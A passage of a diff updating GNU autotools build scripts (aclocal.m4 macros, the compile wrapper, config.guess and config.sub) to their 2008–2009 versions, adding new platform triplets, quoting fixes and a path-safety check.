2> /dev/null`" = "done"; then - am__include=.include - am__quote="\"" - _am_result=BSD - fi + case `$am_make -s -f confmf 2> /dev/null` in #( + *the\ am__doit\ target*) + am__include=.include + am__quote="\"" + _am_result=BSD + ;; + esac fi AC_SUBST([am__include]) AC_SUBST([am__quote]) @@ -577,14 +639,14 @@ AC_MSG_RESULT([$_am_result]) rm -f confinc confmf ]) -# Copyright (C) 1999, 2000, 2001, 2003, 2004, 2005 +# Copyright (C) 1999, 2000, 2001, 2003, 2004, 2005, 2008 # Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 5 +# serial 6 # AM_PROG_CC_C_O # -------------- @@ -596,8 +658,9 @@ AC_REQUIRE_AUX_FILE([compile])dnl # FIXME: we rely on the cache variable name because # there is no other way. set dummy $CC -ac_cc=`echo $[2] | sed ['s/[^a-zA-Z0-9_]/_/g;s/^[0-9]/_/']` -if eval "test \"`echo '$ac_cv_prog_cc_'${ac_cc}_c_o`\" != yes"; then +am_cc=`echo $[2] | sed ['s/[^a-zA-Z0-9_]/_/g;s/^[0-9]/_/']` +eval am_t=\$ac_cv_prog_cc_${am_cc}_c_o +if test "$am_t" != yes; then # Losing compiler, so override with the script. # FIXME: It is wrong to rewrite CC. # But if we don't then we get into trouble of one sort or another. @@ -613,14 +676,14 @@ m4_define([AC_PROG_CC], # Fake the existence of programs that GNU maintainers use. -*- Autoconf -*- -# Copyright (C) 1997, 1999, 2000, 2001, 2003, 2004, 2005 +# Copyright (C) 1997, 1999, 2000, 2001, 2003, 2004, 2005, 2008 # Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 5 +# serial 6 # AM_MISSING_PROG(NAME, PROGRAM) # ------------------------------ @@ -637,7 +700,14 @@ AC_SUBST($1)]) AC_DEFUN([AM_MISSING_HAS_RUN], [AC_REQUIRE([AM_AUX_DIR_EXPAND])dnl AC_REQUIRE_AUX_FILE([missing])dnl -test x"${MISSING+set}" = xset || MISSING="\${SHELL} $am_aux_dir/missing" +if test x"${MISSING+set}" != xset; then + case $am_aux_dir in + *\ * | *\ *) + MISSING="\${SHELL} \"$am_aux_dir/missing\"" ;; + *) + MISSING="\${SHELL} $am_aux_dir/missing" ;; + esac +fi # Use eval to expand $SHELL if eval "$MISSING --run true"; then am_missing_run="$MISSING --run " @@ -675,13 +745,13 @@ esac # Helper functions for option handling. -*- Autoconf -*- -# Copyright (C) 2001, 2002, 2003, 2005 Free Software Foundation, Inc. +# Copyright (C) 2001, 2002, 2003, 2005, 2008 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 3 +# serial 4 # _AM_MANGLE_OPTION(NAME) # ----------------------- @@ -698,7 +768,7 @@ AC_DEFUN([_AM_SET_OPTION], # ---------------------------------- # OPTIONS is a space-separated list of Automake options. AC_DEFUN([_AM_SET_OPTIONS], -[AC_FOREACH([_AM_Option], [$1], [_AM_SET_OPTION(_AM_Option)])]) +[m4_foreach_w([_AM_Option], [$1], [_AM_SET_OPTION(_AM_Option)])]) # _AM_IF_OPTION(OPTION, IF-SET, [IF-NOT-SET]) # ------------------------------------------- @@ -708,14 +778,14 @@ AC_DEFUN([_AM_IF_OPTION], # Check to make sure that the build environment is sane. -*- Autoconf -*- -# Copyright (C) 1996, 1997, 2000, 2001, 2003, 2005 +# Copyright (C) 1996, 1997, 2000, 2001, 2003, 2005, 2008 # Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 4 +# serial 5 # AM_SANITY_CHECK # --------------- @@ -724,16 +794,29 @@ AC_DEFUN([AM_SANITY_CHECK], # Just in case sleep 1 echo timestamp > conftest.file +# Reject unsafe characters in $srcdir or the absolute working directory +# name. Accept space and tab only in the latter. +am_lf=' +' +case `pwd` in + *[[\\\"\#\$\&\'\`$am_lf]]*) + AC_MSG_ERROR([unsafe absolute working directory name]);; +esac +case $srcdir in + *[[\\\"\#\$\&\'\`$am_lf\ \ ]]*) + AC_MSG_ERROR([unsafe srcdir value: `$srcdir']);; +esac + # Do `set' in a subshell so we don't clobber the current shell's # arguments. Must try -L first in case configure is actually a # symlink; some systems play weird games with the mod time of symlinks # (eg FreeBSD returns the mod time of the symlink's containing # directory). if ( - set X `ls -Lt $srcdir/configure conftest.file 2> /dev/null` + set X `ls -Lt "$srcdir/configure" conftest.file 2> /dev/null` if test "$[*]" = "X"; then # -L didn't work. - set X `ls -t $srcdir/configure conftest.file` + set X `ls -t "$srcdir/configure" conftest.file` fi rm -f conftest.file if test "$[*]" != "X $srcdir/configure conftest.file" \ @@ -786,18 +869,25 @@ fi INSTALL_STRIP_PROGRAM="\$(install_sh) -c -s" AC_SUBST([INSTALL_STRIP_PROGRAM])]) -# Copyright (C) 2006 Free Software Foundation, Inc. +# Copyright (C) 2006, 2008 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 2 + # _AM_SUBST_NOTMAKE(VARIABLE) # --------------------------- -# Prevent Automake from outputing VARIABLE = @VARIABLE@ in Makefile.in. +# Prevent Automake from outputting VARIABLE = @VARIABLE@ in Makefile.in. # This macro is traced by Automake. AC_DEFUN([_AM_SUBST_NOTMAKE]) +# AM_SUBST_NOTMAKE(VARIABLE) +# --------------------------- +# Public sister of _AM_SUBST_NOTMAKE. +AC_DEFUN([AM_SUBST_NOTMAKE], [_AM_SUBST_NOTMAKE($@)]) + # Check how to create a tarball. -*- Autoconf -*- # Copyright (C) 2004, 2005 Free Software Foundation, Inc. diff --git a/auto/compile b/auto/compile index 1b1d232..c0096a7 100755 --- a/auto/compile +++ b/auto/compile @@ -1,9 +1,10 @@ #! /bin/sh # Wrapper for compilers which do not understand `-c -o'. -scriptversion=2005-05-14.22 +scriptversion=2009-10-06.20; # UTC -# Copyright (C) 1999, 2000, 2003, 2004, 2005 Free Software Foundation, Inc. +# Copyright (C) 1999, 2000, 2003, 2004, 2005, 2009 Free Software +# Foundation, Inc. # Written by Tom Tromey . # # This program is free software; you can redistribute it and/or modify @@ -17,8 +18,7 @@ scriptversion=2005-05-14.22 # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +# along with this program. If not, see . # As a special exception to the GNU General Public License, if you # distribute this file as part of a program that contains a @@ -103,13 +103,13 @@ if test -z "$ofile" || test -z "$cfile"; then fi # Name of file we expect compiler to create. -cofile=`echo "$cfile" | sed -e 's|^.*/||' -e 's/\.c$/.o/'` +cofile=`echo "$cfile" | sed 's|^.*[\\/]||; s|^[a-zA-Z]:||; s/\.c$/.o/'` # Create the lock directory. -# Note: use `[/.-]' here to ensure that we don't use the same name +# Note: use `[/\\:.-]' here to ensure that we don't use the same name # that we are using for the .o file. Also, base the name on the expected # object file name, since that is what matters with a parallel build. -lockdir=`echo "$cofile" | sed -e 's|[/.-]|_|g'`.d +lockdir=`echo "$cofile" | sed -e 's|[/\\:.-]|_|g'`.d while true; do if mkdir "$lockdir" >/dev/null 2>&1; then break @@ -124,9 +124,9 @@ trap "rmdir '$lockdir'; exit 1" 1 2 15 ret=$? if test -f "$cofile"; then - mv "$cofile" "$ofile" + test "$cofile" = "$ofile" || mv "$cofile" "$ofile" elif test -f "${cofile}bj"; then - mv "${cofile}bj" "$ofile" + test "${cofile}bj" = "$ofile" || mv "${cofile}bj" "$ofile" fi rmdir "$lockdir" @@ -138,5 +138,6 @@ exit $ret # eval: (add-hook 'write-file-hooks 'time-stamp) # time-stamp-start: "scriptversion=" # time-stamp-format: "%:y-%02m-%02d.%02H" -# time-stamp-end: "$" +# time-stamp-time-zone: "UTC" +# time-stamp-end: "; # UTC" # End: diff --git a/auto/config.guess b/auto/config.guess index 396482d..e3a2116 100755 --- a/auto/config.guess +++ b/auto/config.guess @@ -1,10 +1,10 @@ #! /bin/sh # Attempt to guess a canonical system name. # Copyright (C) 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999, -# 2000, 2001, 2002, 2003, 2004, 2005, 2006 Free Software Foundation, -# Inc. +# 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 +# Free Software Foundation, Inc. -timestamp='2006-07-02' +timestamp='2009-06-10' # This file is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by @@ -56,8 +56,8 @@ version="\ GNU config.guess ($timestamp) Originally written by Per Bothner. -Copyright (C) 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005 -Free Software Foundation, Inc. +Copyright (C) 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, +2002, 2003, 2004, 2005, 2006, 2007, 2008 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE." @@ -161,6 +161,7 @@ case "${UNAME_MACHINE}:${UNAME_SYSTEM}:${UNAME_RELEASE}:${UNAME_VERSION}" in arm*) machine=arm-unknown ;; sh3el) machine=shl-unknown ;; sh3eb) machine=sh-unknown ;; + sh5el) machine=sh5le-unknown ;; *) machine=${UNAME_MACHINE_ARCH}-unknown ;; esac # The Operating System including object format, if it has switched @@ -169,7 +170,7 @@ case "${UNAME_MACHINE}:${UNAME_SYSTEM}:${UNAME_RELEASE}:${UNAME_VERSION}" in arm*|i386|m68k|ns32k|sh3*|sparc|vax) eval $set_cc_for_build if echo __ELF__ | $CC_FOR_BUILD -E - 2>/dev/null \ - | grep __ELF__ >/dev/null + | grep -q __ELF__ then # Once all utilities can be ECOFF (netbsdecoff) or a.out (netbsdaout). # Return netbsd for either. FIX? @@ -323,14 +324,30 @@ case "${UNAME_MACHINE}:${UNAME_SYSTEM}:${UNAME_RELEASE}:${UNAME_VERSION}" in case `/usr/bin/uname -p` in sparc) echo sparc-icl-nx7; exit ;; esac ;; + s390x:SunOS:*:*) + echo ${UNAME_MACHINE}-ibm-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'` + exit ;; sun4H:SunOS:5.*:*) echo sparc-hal-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'` exit ;; sun4*:SunOS:5.*:* | tadpole*:SunOS:5.*:*) echo sparc-sun-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'` exit ;; - i86pc:SunOS:5.*:*) - echo i386-pc-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'` + i86pc:SunOS:5.*:* | i86xen:SunOS:5.*:*) + eval $set_cc_for_build + SUN_ARCH="i386" + # If there is a compiler, see if it is configured for 64-bit objects. + # Note that the Sun cc does not turn __LP64__ into 1 like gcc does. + # This test works for both compilers. + if [ "$CC_FOR_BUILD" != 'no_compiler_found' ]; then + if (echo '#ifdef __amd64'; echo IS_64BIT_ARCH; echo '#endif') | \ + (CCOPTS= $CC_FOR_BUILD -E - 2>/dev/null) | \ + grep IS_64BIT_ARCH >/dev/null + then + SUN_ARCH="x86_64" + fi + fi + echo ${SUN_ARCH}-pc-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'` exit ;; sun4*:SunOS:6*:*) # According to config.sub, this is the proper way to canonicalize @@ -531,7 +548,7 @@ EOF echo rs6000-ibm-aix3.2 fi exit ;; - *:AIX:*:[45]) + *:AIX:*:[456]) IBM_CPU_ID=`/usr/sbin/lsdev -C -c processor -S available | sed 1q | awk '{ print $1 }'` if /usr/sbin/lsattr -El ${IBM_CPU_ID} | grep ' POWER' >/dev/null 2>&1; then IBM_ARCH=rs6000 @@ -639,7 +656,7 @@ EOF # => hppa64-hp-hpux11.23 if echo __LP64__ | (CCOPTS= $CC_FOR_BUILD -E - 2>/dev/null) | - grep __LP64__ >/dev/null + grep -q __LP64__ then HP_ARCH="hppa2.0w" else @@ -780,7 +797,7 @@ EOF i*:CYGWIN*:*) echo ${UNAME_MACHINE}-pc-cygwin exit ;; - i*:MINGW*:*) + *:MINGW*:*) echo ${UNAME_MACHINE}-pc-mingw32 exit ;; i*:windows32*:*) @@ -790,15 +807,24 @@ EOF i*:PW*:*) echo ${UNAME_MACHINE}-pc-pw32 exit ;; - x86:Interix*:[3456]*) - echo i586-pc-interix${UNAME_RELEASE} - exit ;; - EM64T:Interix*:[3456]*) - echo x86_64-unknown-interix${UNAME_RELEASE} - exit ;; + *:Interix*:[3456]*) + case ${UNAME_MACHINE} in + x86) + echo i586-pc-interix${UNAME_RELEASE} + exit ;; + EM64T | authenticamd | genuineintel) + echo x86_64-unknown-interix${UNAME_RELEASE} + exit ;; + IA64) + echo ia64-unknown-interix${UNAME_RELEASE} + exit ;; + esac ;; [345]86:Windows_95:* | [345]86:Windows_98:* | [345]86:Windows_NT:*) echo i${UNAME_MACHINE}-pc-mks exit ;; + 8664:Windows_NT:*) + echo x86_64-pc-mks + exit ;; i*:Windows_NT*:* | Pentium*:Windows_NT*:*) # How do we know it's Interix rather than the generic POSIX subsystem? # It also conflicts with pre-2.0 versions of AT&T UWIN. Should we @@ -829,7 +855,14 @@ EOF echo ${UNAME_MACHINE}-pc-minix exit ;; arm*:Linux:*:*) - echo ${UNAME_MACHINE}-unknown-linux-gnu + eval $set_cc_for_build + if echo __ARM_EABI__ | $CC_FOR_BUILD -E - 2>/dev/null \ + | grep -q __ARM_EABI__ + then + echo ${UNAME_MACHINE}-unknown-linux-gnu + else + echo ${UNAME_MACHINE}-unknown-linux-gnueabi + fi exit ;; avr32*:Linux:*:*) echo ${UNAME_MACHINE}-unknown-linux-gnu @@ -852,40 +885,17 @@ EOF m68*:Linux:*:*) echo ${UNAME_MACHINE}-unknown-linux-gnu exit ;; - mips:Linux:*:*) + mips:Linux:*:* | mips64:Linux:*:*) eval $set_cc_for_build sed 's/^ //' << EOF >$dummy.c #undef CPU - #undef mips - #undef mipsel + #undef ${UNAME_MACHINE} + #undef ${UNAME_MACHINE}el #if defined(__MIPSEL__) || defined(__MIPSEL) || defined(_MIPSEL) || defined(MIPSEL) - CPU=mipsel + CPU=${UNAME_MACHINE}el #else #if defined(__MIPSEB__) || defined(__MIPSEB) || defined(_MIPSEB) || defined(MIPSEB) - CPU=mips - #else - CPU= - #endif - #endif -EOF - eval "`$CC_FOR_BUILD -E $dummy.c 2>/dev/null | sed -n ' - /^CPU/{ - s: ::g - p - }'`" - test x"${CPU}" != x && { echo "${CPU}-unknown-linux-gnu"; exit; } - ;; - mips64:Linux:*:*) - eval $set_cc_for_build - sed 's/^ //' << EOF >$dummy.c - #undef CPU - #undef mips64 - #undef mips64el - #if defined(__MIPSEL__) || defined(__MIPSEL) || defined(_MIPSEL) || defined(MIPSEL) - CPU=mips64el - #else - #if defined(__MIPSEB__) || defined(__MIPSEB) || defined(_MIPSEB) || defined(MIPSEB) - CPU=mips64 + CPU=${UNAME_MACHINE} #else CPU= #endif @@ -917,10 +927,13 @@ EOF EV67) UNAME_MACHINE=alphaev67 ;; EV68*) UNAME_MACHINE=alphaev68 ;; esac - objdump --private-headers /bin/sh | grep ld.so.1 >/dev/null + objdump --private-headers /bin/sh | grep -q ld.so.1 if test "$?" = 0 ; then LIBC="libc1" ; else LIBC="" ; fi echo ${UNAME_MACHINE}-unknown-linux-gnu${LIBC} exit ;; + padre:Linux:*:*) + echo sparc-unknown-linux-gnu + exit ;; parisc:Linux:*:* | hppa:Linux:*:*) # Look for CPU level case `grep '^cpu[^a-z]*:' /proc/cpuinfo 2>/dev/null | cut -d' ' -f2` in @@ -950,6 +963,9 @@ EOF x86_64:Linux:*:*) echo x86_64-unknown-linux-gnu exit ;; + xtensa*:Linux:*:*) + echo ${UNAME_MACHINE}-unknown-linux-gnu + exit ;; i*86:Linux:*:*) # The BFD linker knows what the default object file format is, so # first see if it will tell us. cd to the root directory to prevent @@ -965,17 +981,6 @@ EOF elf32-i386) TENTATIVE="${UNAME_MACHINE}-pc-linux-gnu" ;; - a.out-i386-linux) - echo "${UNAME_MACHINE}-pc-linux-gnuaout" - exit ;; - coff-i386) - echo "${UNAME_MACHINE}-pc-linux-gnucoff" - exit ;; - "") - # Either a pre-BFD a.out linker (linux-gnuoldld) or - # one that does not give us useful --help. - echo "${UNAME_MACHINE}-pc-linux-gnuoldld" - exit ;; esac # Determine whether the default compiler is a.out or elf eval $set_cc_for_build @@ -1041,7 +1046,7 @@ EOF i*86:syllable:*:*) echo ${UNAME_MACHINE}-pc-syllable exit ;; - i*86:LynxOS:2.*:* | i*86:LynxOS:3.[01]*:* | i*86:LynxOS:4.0*:*) + i*86:LynxOS:2.*:* | i*86:LynxOS:3.[01]*:* | i*86:LynxOS:4.[02]*:*) echo i386-unknown-lynxos${UNAME_RELEASE} exit ;; i*86:*DOS:*:*) @@ -1085,8 +1090,11 @@ EOF pc:*:*:*) # Left here for compatibility: # uname -m prints for DJGPP always 'pc', but it prints nothing about - # the processor, so we play safe by assuming i386. - echo i386-pc-msdosdjgpp + # the processor, so we play safe by assuming i586. + # Note: whatever this is, it MUST be the same as what config.sub + # prints for the "djgpp" host, or else GDB configury will decide that + # this is a cross-build. + echo i586-pc-msdosdjgpp exit ;; Intel:Mach:3*:*) echo i386-pc-mach3 @@ -1124,6 +1132,16 @@ EOF 3[34]??:*:4.0:* | 3[34]??,*:*:4.0:*) /bin/uname -p 2>/dev/null | grep 86 >/dev/null \ && { echo i486-ncr-sysv4; exit; } ;; + NCR*:*:4.2:* | MPRAS*:*:4.2:*) + OS_REL='.3' + test -r /etc/.relid \ + && OS_REL=.`sed -n 's/[^ ]* [^ ]* \([0-9][0-9]\).*/\1/p' < /etc/.relid` + /bin/uname -p 2>/dev/null | grep 86 >/dev/null \ + && { echo i486-ncr-sysv4.3${OS_REL}; exit; } + /bin/uname -p 2>/dev/null | /bin/grep entium >/dev/null \ + && { echo i586-ncr-sysv4.3${OS_REL}; exit; } + /bin/uname -p 2>/dev/null | /bin/grep pteron >/dev/null \ + && { echo i586-ncr-sysv4.3${OS_REL}; exit; } ;; m68*:LynxOS:2.*:* | m68*:LynxOS:3.0*:*) echo m68k-unknown-lynxos${UNAME_RELEASE} exit ;; @@ -1136,7 +1154,7 @@ EOF rs6000:LynxOS:2.*:*) echo rs6000-unknown-lynxos${UNAME_RELEASE} exit ;; - PowerPC:LynxOS:2.*:* | PowerPC:LynxOS:3.[01]*:* | PowerPC:LynxOS:4.0*:*) + PowerPC:LynxOS:2.*:* | PowerPC:LynxOS:3.[01]*:* | PowerPC:LynxOS:4.[02]*:*) echo powerpc-unknown-lynxos${UNAME_RELEASE} exit ;; SM[BE]S:UNIX_SV:*:*) @@ -1199,6 +1217,9 @@ EOF BePC:BeOS:*:*) # BeOS running on Intel PC compatible. echo i586-pc-beos exit ;; + BePC:Haiku:*:*) # Haiku running on Intel PC compatible. + echo i586-pc-haiku + exit ;; SX-4:SUPER-UX:*:*) echo sx4-nec-superux${UNAME_RELEASE} exit ;; @@ -1208,6 +1229,15 @@ EOF SX-6:SUPER-UX:*:*) echo sx6-nec-superux${UNAME_RELEASE} exit ;; + SX-7:SUPER-UX:*:*) + echo sx7-nec-superux${UNAME_RELEASE} + exit ;; + SX-8:SUPER-UX:*:*) + echo sx8-nec-superux${UNAME_RELEASE} + exit ;; + SX-8R:SUPER-UX:*:*) + echo sx8r-nec-superux${UNAME_RELEASE} + exit ;; Power*:Rhapsody:*:*) echo powerpc-apple-rhapsody${UNAME_RELEASE} exit ;; @@ -1298,6 +1328,9 @@ EOF i*86:rdos:*:*) echo ${UNAME_MACHINE}-pc-rdos exit ;; + i*86:AROS:*:*) + echo ${UNAME_MACHINE}-pc-aros + exit ;; esac #echo '(No uname command or uname output not recognized.)' 1>&2 @@ -1458,9 +1491,9 @@ This script, last modified $timestamp, has failed to recognize the operating system you are using. It is advised that you download the most up to date version of the config scripts from - http://savannah.gnu.org/cgi-bin/viewcvs/*checkout*/config/config/config.guess + http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=config.guess;hb=HEAD and - http://savannah.gnu.org/cgi-bin/viewcvs/*checkout*/config/config/config.sub + http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=config.sub;hb=HEAD If the version you run ($0) is already up to date, please send the following data and any information you think might be diff --git a/auto/config.sub b/auto/config.sub index fab0aa3..eb0389a 100755 --- a/auto/config.sub +++ b/auto/config.sub @@ -1,10 +1,10 @@ #! /bin/sh # Configuration validation subroutine script. # Copyright (C) 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999, -# 2000, 2001, 2002, 2003, 2004, 2005, 2006 Free Software Foundation, -# Inc. +# 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 +# Free Software Foundation, Inc. -timestamp='2006-09-20' +timestamp='2009-06-11' # This file is (in principle) common to ALL GNU software. # The presence of a machine in this file suggests that SOME GNU software @@ -72,8 +72,8 @@ Report bugs and patches to ." version="\ GNU config.sub ($timestamp) -Copyright (C) 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005 -Free Software Foundation, Inc. +Copyright (C) 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, +2002, 2003, 2004, 2005, 2006, 2007, 2008 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE." @@ -122,6 +122,7 @@ maybe_os=`echo $1 | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\2/'` case $maybe_os in nto-qnx* | linux-gnu* | linux-dietlibc | linux-newlib* | linux-uclibc* | \ uclinux-uclibc* | uclinux-gnu* | kfreebsd*-gnu* | knetbsd*-gnu* | netbsd*-gnu* | \ + kopensolaris*-gnu* | \ storm-chaos* | os2-emx* | rtmk-nova*) os=-$maybe_os basic_machine=`echo $1 | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\1/'` @@ -152,6 +153,9 @@ case $os in os= basic_machine=$1 ;; + -bluegene*) + os=-cnk + ;; -sim | -cisco | -oki | -wec | -winbond) os= basic_machine=$1 @@ -245,17 +249,20 @@ case $basic_machine in | bfin \ | c4x | clipper \ | d10v | d30v | dlx | dsp16xx \ - | fr30 | frv \ + | fido | fr30 | frv \ | h8300 | h8500 | hppa | hppa1.[01] | hppa2.0 | hppa2.0[nw] | hppa64 \ | i370 | i860 | i960 | ia64 \ | ip2k | iq2000 \ + | lm32 \ | m32c | m32r | m32rle | m68000 | m68k | m88k \ - | maxq | mb | microblaze | mcore \ + | maxq | mb | microblaze | mcore | mep | metag \ | mips | mipsbe | mipseb | mipsel | mipsle \ | mips16 \ | mips64 | mips64el \ - | mips64vr | mips64vrel \ + | mips64octeon | mips64octeonel \ | mips64orion | mips64orionel \ + | mips64r5900 | mips64r5900el \ + | mips64vr | mips64vrel \ | mips64vr4100 | mips64vr4100el \ | mips64vr4300 | mips64vr4300el \ | mips64vr5000 | mips64vr5000el \ @@ -268,6 +275,7 @@ case $basic_machine in | mipsisa64sr71k | mipsisa64sr71kel \ | mipstx39 | mipstx39el \ | mn10200 | mn10300 \ + | moxie \ | mt \ | msp430 \ | nios | nios2 \ @@ -277,7 +285,7 @@ case $basic_machine in | powerpc | powerpc64 | powerpc64le | powerpcle | ppcbe \ | pyramid \ | score \ - | sh | sh[1234] | sh[24]a | sh[23]e | sh[34]eb | sheb | shbe | shle | sh[1234]le | sh3ele \ + | sh | sh[1234] | sh[24]a | sh[24]aeb | sh[23]e | sh[34]eb | sheb | shbe | shle | sh[1234]le | sh3ele \ | sh64 | sh64le \ | sparc | sparc64 | sparc64b | sparc64v | sparc86x | sparclet | sparclite \ | sparcv8 | sparcv9 | sparcv9b | sparcv9v \ @@ -286,7 +294,7 @@ case $basic_machine in | v850 | v850e \ | we32k \ | x86 | xc16x | xscale | xscalee[bl] | xstormy16 | xtensa \ - | z8k) + | z8k | z80) basic_machine=$basic_machine-unknown ;; m6811 | m68hc11 | m6812 | m68hc12) @@ -324,19 +332,22 @@ case $basic_machine in | clipper-* | craynv-* | cydra-* \ | d10v-* | d30v-* | dlx-* \ | elxsi-* \ - | f30[01]-* | f700-* | fr30-* | frv-* | fx80-* \ + | f30[01]-* | f700-* | fido-* | fr30-* | frv-* | fx80-* \ | h8300-* | h8500-* \ | hppa-* | hppa1.[01]-* | hppa2.0-* | hppa2.0[nw]-* | hppa64-* \ | i*86-* | i860-* | i960-* | ia64-* \ | ip2k-* | iq2000-* \ + | lm32-* \ | m32c-* | m32r-* | m32rle-* \ | m68000-* | m680[012346]0-* | m68360-* | m683?2-* | m68k-* \ - | m88110-* | m88k-* | maxq-* | mcore-* \ + | m88110-* | m88k-* | maxq-* | mcore-* | metag-* \ | mips-* | mipsbe-* | mipseb-* | mipsel-* | mipsle-* \ | mips16-* \ | mips64-* | mips64el-* \ - | mips64vr-* | mips64vrel-* \ + | mips64octeon-* | mips64octeonel-* \ | mips64orion-* | mips64orionel-* \ + | mips64r5900-* | mips64r5900el-* \ + | mips64vr-* | mips64vrel-* \ | mips64vr4100-* | mips64vr4100el-* \ | mips64vr4300-* | mips64vr4300el-* \ | mips64vr5000-* | mips64vr5000el-* \ @@ -358,20 +369,24 @@ case $basic_machine in | powerpc-* | powerpc64-* | powerpc64le-* | powerpcle-* | ppcbe-* \ | pyramid-* \ | romp-* | rs6000-* \ - | sh-* | sh[1234]-* | sh[24]a-* | sh[23]e-* | sh[34]eb-* | sheb-* | shbe-* \ + | sh-* | sh[1234]-* | sh[24]a-* | sh[24]aeb-* | sh[23]e-* | sh[34]eb-* | sheb-* | shbe-* \ | shle-* | sh[1234]le-* | sh3ele-* | sh64-* | sh64le-* \ | sparc-* | sparc64-* | sparc64b-* | sparc64v-* | sparc86x-* | sparclet-* \ | sparclite-* \ | sparcv8-* | sparcv9-* | sparcv9b-* | sparcv9v-* | strongarm-* | sv1-* | sx?-* \ | tahoe-* | thumb-* \ - | tic30-* | tic4x-* | tic54x-* | tic55x-* | tic6x-* | tic80-* \ + | tic30-* | tic4x-* | tic54x-* | tic55x-* | tic6x-* | tic80-* | tile-* \ | tron-* \ | v850-* | v850e-* | vax-* \ | we32k-* \ | x86-* | x86_64-* | xc16x-* | xps100-* | xscale-* | xscalee[bl]-* \ - | xstormy16-* | xtensa-* \ + | xstormy16-* | xtensa*-* \ | ymp-* \ - | z8k-*) + | z8k-* | z80-*) + ;; + # Recognize the basic CPU types without company name, with glob match. + xtensa*) + basic_machine=$basic_machine-unknown ;; # Recognize the various machine names and aliases which stand # for a CPU type and a company and sometimes even an OS. @@ -435,6 +450,10 @@ case $basic_machine in basic_machine=m68k-apollo os=-bsd ;; + aros) + basic_machine=i386-pc + os=-aros + ;; aux) basic_machine=m68k-apple os=-aux @@ -443,10 +462,26 @@ case $basic_machine in basic_machine=ns32k-sequent os=-dynix ;; + blackfin) + basic_machine=bfin-unknown + os=-linux + ;; + blackfin-*) + basic_machine=bfin-`echo $basic_machine | sed 's/^[^-]*-//'` + os=-linux + ;; + bluegene*) + basic_machine=powerpc-ibm + os=-cnk + ;; c90) basic_machine=c90-cray os=-unicos ;; + cegcc) + basic_machine=arm-unknown + os=-cegcc + ;; convex-c1) basic_machine=c1-convex os=-bsd @@ -475,8 +510,8 @@ case $basic_machine in basic_machine=craynv-cray os=-unicosmp ;; - cr16c) - basic_machine=cr16c-unknown + cr16) + basic_machine=cr16-unknown os=-elf ;; crds | unos) @@ -514,6 +549,10 @@ case $basic_machine in basic_machine=m88k-motorola os=-sysv3 ;; + dicos) + basic_machine=i686-pc + os=-dicos + ;; djgpp) basic_machine=i586-pc os=-msdosdjgpp @@ -668,6 +707,14 @@ case $basic_machine in basic_machine=m68k-isi os=-sysv ;; + m68knommu) + basic_machine=m68k-unknown + os=-linux + ;; + m68knommu-*) + basic_machine=m68k-`echo $basic_machine | sed 's/^[^-]*-//'` + os=-linux + ;; m88k-omron*) basic_machine=m88k-omron ;; @@ -683,6 +730,10 @@ case $basic_machine in basic_machine=i386-pc os=-mingw32 ;; + mingw32ce) + basic_machine=arm-unknown + os=-mingw32ce + ;; miniframe) basic_machine=m68000-convergent ;; @@ -809,6 +860,14 @@ case $basic_machine in basic_machine=i860-intel os=-osf ;; + parisc) + basic_machine=hppa-unknown + os=-linux + ;; + parisc-*) + basic_machine=hppa-`echo $basic_machine | sed 's/^[^-]*-//'` + os=-linux + ;; pbd) basic_machine=sparc-tti ;; @@ -925,6 +984,9 @@ case $basic_machine in basic_machine=sh-hitachi os=-hms ;; + sh5el) + basic_machine=sh5le-unknown + ;; sh64) basic_machine=sh64-unknown ;; @@ -1014,6 +1076,10 @@ case $basic_machine in basic_machine=tic6x-unknown os=-coff ;; + tile*) + basic_machine=tile-unknown + os=-linux-gnu + ;; tx39) basic_machine=mipstx39-unknown ;; @@ -1089,6 +1155,10 @@ case $basic_machine in basic_machine=z8k-unknown os=-sim ;; + z80-*-coff) + basic_machine=z80-unknown + os=-sim + ;; none) basic_machine=none-none os=-none @@ -1127,7 +1197,7 @@ case $basic_machine in we32k) basic_machine=we32k-att ;; - sh[1234] | sh[24]a | sh[34]eb | sh[1234]le | sh[23]ele) + sh[1234] | sh[24]a | sh[24]aeb | sh[34]eb | sh[1234]le | sh[23]ele) basic_machine=sh-unknown ;; sparc | sparcv8 | sparcv9 | sparcv9b | sparcv9v) @@ -1197,10 +1267,11 @@ case $os in # Each alternative MUST END IN A *, to match a version number. # -sysv* is 